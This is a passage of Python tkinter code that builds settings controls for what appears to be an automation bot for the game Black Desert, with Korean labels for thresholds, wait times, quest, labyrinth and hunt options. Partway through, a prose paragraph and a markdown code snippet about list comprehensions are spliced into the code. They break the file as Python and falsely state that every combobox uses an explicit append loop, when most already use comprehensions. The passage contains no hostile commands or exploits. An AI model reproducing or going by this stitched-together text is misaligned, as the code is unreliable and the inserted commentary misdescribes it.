if not lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit'] = 3
combobox_list = []
for i in range(2, 100):
combobox_list.append(str(i))
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("미궁 감지 체크 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit'].trace(
'w', lambda *args: self.callback_threshold_migung_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit')
)
if lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit'] = 10
combobox_list = [str(i) for i in range(5, 31)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'migung_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("이동 중 체크 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit'].trace(
'w', lambda *args: self.callback_threshold_moving_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit')
)
if lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit'] = 200
combobox_list = [str(i) for i in range(0, 1001, 5)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'moving_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("물약 없음 체크 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit'].trace(
'w', lambda *args: self.callback_threshold_potion_empty_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit')
)
if lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit'] = 30
combobox_list = [str(i) for i in range(0, 1001, 5)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'potion_empty_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_left.pack(side=tkinter.LEFT, anchor=tkinter.NW)
frame_label = ttk.LabelFrame(frame_head, text='반복 주기(초)')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("무반응시 메인 퀘스트 클릭 주기")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk'].trace(
'w', lambda *args: self.callback_period_mainquest_afk_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk')
)
if lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk'] = 120
combobox_list = [str(i) for i in range(5, 240, 5)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest_afk'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("자동 사냥 랙 방지 움직임 주기")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag'].trace(
'w', lambda *args: self.callback_period_jadong_lag_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag')
)
if lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag'] = 0
combobox_list = [str(i) for i in range(0, 1201, 5)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'jadong_lag'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("토벌/미궁 랙 방지 움직임 주기")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag'].trace(
'w', lambda *args: self.callback_period_migung_lag_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag')
)
if lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag'] = 30
combobox_list = [str(i) for i in range(0, 1201, 5)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'migung_lag'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_head, text='대기 시간(초)')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 클릭 후 다음 클릭까지")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest'].trace(
'w', lambda *args: self.callback_period_mainquest_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest')
)
if lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest'] = 120
combobox_list = [str(i) for i in range(5, 30000, 5)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'main_quest'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 클릭 후 수동 스킬 사용")
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_WAIT_ATTACK)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack'].trace(
'w', lambda *args: self.callback_period_wait_attack_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack')
)
if lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack'] = 30
combobox_list = [str(i) for i in range(5, 240, 5)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_attack'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 클릭 후 자동 태세 전환")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong'].trace(
'w', lambda *args: self.callback_period_wait_jadong_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong')
)
if lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong'] = 10
combobox_list = [str(i) for i in range(5, 300, 5)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'wait_jadong'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("가방 경고 인식 후 클릭 대기")
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_TOOLTIP_GABANG_FULL)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full'].trace(
'w', lambda *args: self.callback_period_gabang_full_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full')
)
if lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full'] = 30
combobox_list = [str(i) for i in range(0, 86401, 60)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'gabang_full'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("절전 모드 경고 인식 후 대기")
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_TOOLTIP_GABANG_FULL) # NOTE: reuses the bag-full tooltip constant for the power-saving warning row; possibly a copy-paste leftover
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning'].trace(
'w', lambda *args: self.callback_period_jeoljeon_mode_warning_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning')
)
if lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning'] = 1800
combobox_list = [str(i) for i in range(0, 86401, 60)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'jeoljeon_mode_warning'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("물약 상점 인식 지연 시간")
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_TOOTLIP_POTION_SHOP)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop'].trace(
'w', lambda *args: self.callback_period_potion_shop_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop')
)
if lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop'] = 300
combobox_list = [str(i) for i in range(5, 600, 5)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'potion_shop'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("월드 보스 이동 시간")
)
label.pack(side=tkinter.LEFT)
self.tooltip(label, lybconstant.LYB_TOOTLIP_POTION_SHOP) # NOTE: reuses the potion-shop tooltip constant for the world-boss row; possibly a copy-paste leftover
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss'].trace(
'w', lambda *args: self.callback_period_world_boss_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss')
)
if lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss'] = 90
combobox_list = [str(i) for i in range(10, 301, 5)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'world_boss'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
# frame = ttk.Frame(frame_label)
# label = ttk.Label(
# master = frame,
# text = self.get_option_text("반복 퀘스트 완료 대기(랜덤)")
# )
# label.pack(side=tkinter.LEFT)
# self.tooltip(label, lybconstant.LYB_TOOTLIP_POTION_SHOP)
# self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random'] = tkinter.StringVar(frame)
# self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random'].trace(
# 'w', lambda *args: self.callback_period_reqeat_quest_random_stringvar(args, lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random')
# )
# if not lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random' in self.configure.common_config[self.game_name]:
# self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random'] = 10
# combobox_list = []
# for i in range(0, 1000):
# combobox_list.append(str(i))
# combobox = ttk.Combobox(
# master = frame,
# values = combobox_list,
# textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random'],
# state = "readonly",
# height = 10,
# width = 5,
# font = lybconstant.LYB_FONT
# )
# combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_PERIOD + 'reqeat_quest_random'])
# combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
# frame.pack(anchor=tkinter.W)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_head.pack(anchor=tkinter.W)
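Every combobox in this section builds its value list with an explicit append loop. The same lists can come from a one-line comprehension, which keeps the `range` bounds visible at a glance; a small Tk-independent sketch (`make_values` is a hypothetical helper name):

```python
def make_values(start, stop, step=1):
    # ttk.Combobox values are strings, so each number is stringified,
    # exactly as the append loops above do.
    return [str(i) for i in range(start, stop, step)]

threshold_values = make_values(50, 91)    # '50' .. '90'
moving_values = make_values(0, 1001, 5)   # '0', '5', .. '1000'
```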
frame_head = ttk.Frame(self.inner_frame_dic['hunt_tab_frame'])
frame_label = ttk.LabelFrame(frame_head, text='설정')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean'].trace(
'w', lambda *args: self.callback_quest_repeat_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean')
)
if lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '반복 의뢰를 수락합니다',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = ' '
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target'].trace(
'w', lambda *args: self.callback_fix_target_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target')
)
if lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '타겟 고정을 해제합니다',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK + 'fix_target'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = ' '
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean'].trace(
'w', lambda *args: self.callback_migung_invite_boolean_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '미궁 초대 자동 수락',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_boolean'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op'].trace(
'w', lambda *args: self.callback_migung_invite_rank_op_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op')
)
combobox_list = LYBBlackDesert.migung_rank_op_list
if lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op'] = combobox_list[1]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank_op'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank'].trace(
'w', lambda *args: self.callback_migung_invite_rank_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank')
)
combobox_list = [str(i) for i in range(1, 9)]
if lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank'] = 4
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = '단계, ≤'
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2'].trace(
'w', lambda *args: self.callback_migung_invite_rank2_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2')
)
combobox_list = [str(i) for i in range(1, 9)]
if lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2'] = 6
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2'],
# justify = tkinter.CENTER,
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'migung_invite_rank2'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = '단계'
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'period'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'period'].trace(
'w', lambda *args: self.callback_hunt_period_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'period')
)
combobox_list = [str(i) for i in range(60, 100000, 60)]
if lybconstant.LYB_DO_STRING_BD_HUNT + 'period' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'period'] = 3600
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'period'],
state = "readonly",
height = 10,
width = 7,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'period'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초 동안 자동 사냥 진행 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period'].trace(
'w', lambda *args: self.callback_hunt_pet_period_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period')
)
combobox_list = [str(i) for i in range(0, 3601, 60)]
if lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period'] = 3600
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'pet_period'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초마다 반려 동물 체크"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence'].trace(
'w', lambda *args: self.callback_complete_sequence_booleanvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence')
)
if lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '퀘스트 완료 무작위 대기 후 클릭(',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_sequence'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "최대"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period'].trace(
'w', lambda *args: self.callback_complete_period_stringvar(args, lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period')
)
combobox_list = [str(i) for i in range(1, 61)]
if lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period'] = 2
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period'],
state = "readonly",
height = 10,
width = 2,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_HUNT + 'complete_period'])
